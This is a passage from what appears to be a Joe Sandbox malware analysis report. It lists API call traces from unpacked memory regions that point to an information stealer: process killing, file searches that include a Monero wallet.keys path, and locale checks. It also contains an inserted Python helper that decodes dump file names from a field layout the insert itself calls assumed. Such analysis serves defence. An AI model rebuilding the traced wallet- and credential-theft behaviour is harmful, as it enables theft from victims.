                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: %6uf$& $35U+$3fiC$3j?i$?aL$S,~$a7$J]w
                                      • API String ID: 0-3786039081
                                      • Opcode ID: 1cf58d2f07e954b66e7172a48d30dff8000029ffe764f6139ba2fb6ecbff5e16
                                      • Instruction ID: 3eb082bf4344b0c9e736799b7100da2d4e9ea400d18195e1d508fd766ee63b93
                                      • Opcode Fuzzy Hash: 1cf58d2f07e954b66e7172a48d30dff8000029ffe764f6139ba2fb6ecbff5e16
                                      • Instruction Fuzzy Hash: 469249F3A0C2149FE3046E2DEC8567ABBE9EFD4320F1A463DEAC4C7744E93558058696
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00129905
                                      • Process32First.KERNEL32(00119FDE,00000128), ref: 00129919
                                      • Process32Next.KERNEL32(00119FDE,00000128), ref: 0012992E
                                      • StrCmpCA.SHLWAPI(?,00119FDE), ref: 00129943
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012995C
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0012997A
                                      • CloseHandle.KERNEL32(00000000), ref: 00129987
                                      • CloseHandle.KERNEL32(00119FDE), ref: 00129993
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: e439519152232c2f103c77cdedea692bdd2c4906aa7c96690d970730d40bd405
                                      • Instruction ID: 39c67ee3c3074213038da586f0b002b4082122701e870b9a12776e974b8f4cf2
                                      • Opcode Fuzzy Hash: e439519152232c2f103c77cdedea692bdd2c4906aa7c96690d970730d40bd405
                                      • Instruction Fuzzy Hash: 7A11EF75904318EBDB25DFA4EC88BDDB77DBB48705F00469CF505AA280D7749A84CF90
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00130D79), ref: 0011E5A2
                                      • StrCmpCA.SHLWAPI(?,001315F0), ref: 0011E5F2
                                      • StrCmpCA.SHLWAPI(?,001315F4), ref: 0011E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$
                                      • API String ID: 433455689-3283393764
                                      • Opcode ID: c4a61fb178381f1b232925e1e5c61220d11b441e13477506f970ca1151a251ab
                                      • Instruction ID: 3fd129e9c7f96286f5411096d640fd620e20fda7b55b7950281469a29d144713
                                      • Opcode Fuzzy Hash: c4a61fb178381f1b232925e1e5c61220d11b441e13477506f970ca1151a251ab
                                      • Instruction Fuzzy Hash: AC12E671A101289BCB19FB60EDA6EED7379AF74300F8045E9B50A66191EF306F58CF52
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,001305B7), ref: 00127D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00127D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00127D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00127DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00127EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: b7ec97a4a7248c97ba92b164d8fbb3ecc35e6521825499803bcfacf46fde1f68
                                      • Instruction ID: c16ac043921070b01e29e0d9be50ead69d42e7c30d6c8db8dad5ba22058c63a8
                                      • Opcode Fuzzy Hash: b7ec97a4a7248c97ba92b164d8fbb3ecc35e6521825499803bcfacf46fde1f68
                                      • Instruction Fuzzy Hash: C1416071940228ABCB24DB94EC99BEEB378FF54700F5045D9E10966290DB742F94CFA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: -N*y$AP}o$Qv|$_:q$zw}$~7
                                      • API String ID: 0-2152543367
                                      • Opcode ID: 49afe0b7e48fc61de336f90467320d437aa2a53409c207d3f5a63165280a6dc8
                                      • Instruction ID: a8d0b78afb08fa0ee82e98f5152e2a60463aba8b7abe853b635b4cd64fba9b5f
                                      • Opcode Fuzzy Hash: 49afe0b7e48fc61de336f90467320d437aa2a53409c207d3f5a63165280a6dc8
                                      • Instruction Fuzzy Hash: 98B209F3A0C2049FE304AE2DEC8567AFBE9EB94320F1A493DEAC5C3744E57558058697
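                                       The memory-dump file names repeated in every "Memory Dump Source" block on this page carry the region metadata an analyst actually wants: which process and analysis stage the dump came from, the region base, and the page protection it had at dump time. The block below is an added example written for this page, not Joe Sandbox code or output; the field layout it parses (process index, stage, dump id, region base, page protection, an unknown field, region type, an unknown field) is the editor's reading of the names quoted above and should be checked against the Joe Sandbox documentation before being relied on. The PAGE_* and MEM_* constant values are from winnt.h and are not assumptions. The sample names are copied from this page.

```python
import re

# Constructed input: three dump names copied from the "Memory Dump Source" lists
# on this page (RW header page, RWX region, execute-writecopy region).
SAMPLE_DUMPS = [
    "00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp",
]

# winnt.h page protection and region type constants (fact, not assumption).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_AND_EXECUTABLE = 0x40 | 0x80

# ASSUMED field layout, derived from the names on this page, not from Joe Sandbox docs:
# process.stage.dumpid.base(16 hex).protect.unknown.type.unknown.sdmp
DUMP_NAME = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


def parse_dump_name(name):
    """Split one .sdmp file name into its fields and decode protection and type."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError("unexpected dump name: %s" % name)
    protect = int(m.group(5), 16)
    region_type = int(m.group(7), 16)
    label = PAGE_PROTECT.get(protect & 0xFF, hex(protect))
    if protect & PAGE_GUARD:
        label += " | PAGE_GUARD"
    return {
        "process": int(m.group(1), 16),
        "stage": int(m.group(2), 16),
        "dump_id": m.group(3),
        "base": int(m.group(4), 16),
        "protect": label,
        "writable_executable": bool(protect & WRITABLE_AND_EXECUTABLE),
        "type": MEM_TYPE.get(region_type, hex(region_type)),
    }


def rwx_image_regions(names):
    """Bases of image-backed regions that are both writable and executable.

    A normally mapped PE has RX code and RW data; image pages that are RWX (or
    execute-writecopy) at end of run are the footprint of a packer rewriting
    section rights, which is what makes these dumps worth pulling first.
    """
    hits = []
    for name in names:
        info = parse_dump_name(name)
        if info["type"] == "MEM_IMAGE" and info["writable_executable"]:
            hits.append(info["base"])
    return hits


if __name__ == "__main__":
    for name in SAMPLE_DUMPS:
        info = parse_dump_name(name)
        print("%08X %-24s %s" % (info["base"], info["protect"], info["type"]))
    print("RWX image regions:", [hex(b) for b in rwx_image_regions(SAMPLE_DUMPS)])
```

                                       On the names quoted on this page only the 00110000 region (the PE header page) is PAGE_READWRITE; every other image region is PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, so the whole mapped image after unpacking is the dump to load into IDA, which is consistent with the single snapshot file hcaresult_0_2_110000_file.jbxd that every entry references.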
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 4&Oo$:p~;$G!;{$MVo7$f?}$o}j
                                      • API String ID: 0-3054999465
                                      • Opcode ID: ca7525532ea959a7a29365dee24c06376a07b09aaaef3b770dc57acf626ce1fe
                                      • Instruction ID: 7d0bd99d964b494d56409acdf549d8e436e526c7575d52f899b2932808b846f6
                                      • Opcode Fuzzy Hash: ca7525532ea959a7a29365dee24c06376a07b09aaaef3b770dc57acf626ce1fe
                                      • Instruction Fuzzy Hash: DDB2E5F3A082109FE3046F29EC85A7AFBE9EF94720F1A493DE6C4C7744E63558418796
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !(ym$0o4j$?V{g$~K?w$~Y/
                                      • API String ID: 0-1041309207
                                      • Opcode ID: 7a5240142ce0f6eb296a63cbfadbeb6ba39843b46d218e558db016a4033302ff
                                      • Instruction ID: 661d67fa5e70fade766fcc2811f80559c56007a64e5c63850a732cc1c99d4118
                                      • Opcode Fuzzy Hash: 7a5240142ce0f6eb296a63cbfadbeb6ba39843b46d218e558db016a4033302ff
                                      • Instruction Fuzzy Hash: 51B228F360C204AFE3046E2DEC8567AFBE9EF94260F1A463DE6C4C3744E97598058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ISv}$In?$PsV;$T8o$h_w
                                      • API String ID: 0-309991843
                                      • Opcode ID: e1051e8325ea6589b6e26426a67a64abde73649652da43f9de9b5d60b92cddb8
                                      • Instruction ID: a45fba484bab68370739d11de2046f359d9e9d005eae098fc3f188eb4b0271fd
                                      • Opcode Fuzzy Hash: e1051e8325ea6589b6e26426a67a64abde73649652da43f9de9b5d60b92cddb8
                                      • Instruction Fuzzy Hash: A5A2FAF3A0C2049FE304AE29EC8577ABBE9EF94720F1A853DE6C4C7744E63558058697
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 1ba6de97e10441152faff99246d74fbb9c551f9a61b6bf9de75d62db466395c9
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 01418E12E19BD9C5CB058B7444A02AEBFB22FE6210F6D82EEC4DD1F782C774414AD3A5
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0011C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0011C97C
                                      • lstrcat.KERNEL32(?,00130B47), ref: 0011CA43
                                      • lstrcat.KERNEL32(?,00130B4B), ref: 0011CA57
                                      • lstrcat.KERNEL32(?,00130B4E), ref: 0011CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                       • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 5ff843c5e13aae8732407f174de35d55376d1d1cbf53f9f751c1b5485ce2dbdd
                                      • Instruction ID: de6ec34147d026b037cab335204146b5e370b1d26e031022b4f9e931f2c83136
                                      • Opcode Fuzzy Hash: 5ff843c5e13aae8732407f174de35d55376d1d1cbf53f9f751c1b5485ce2dbdd
                                      • Instruction Fuzzy Hash: D0415174D0421D9BDB25CFA4DD89BEEF7B8AF48304F1046A8E509A72C0D7705A84CF91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001172AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001172B4
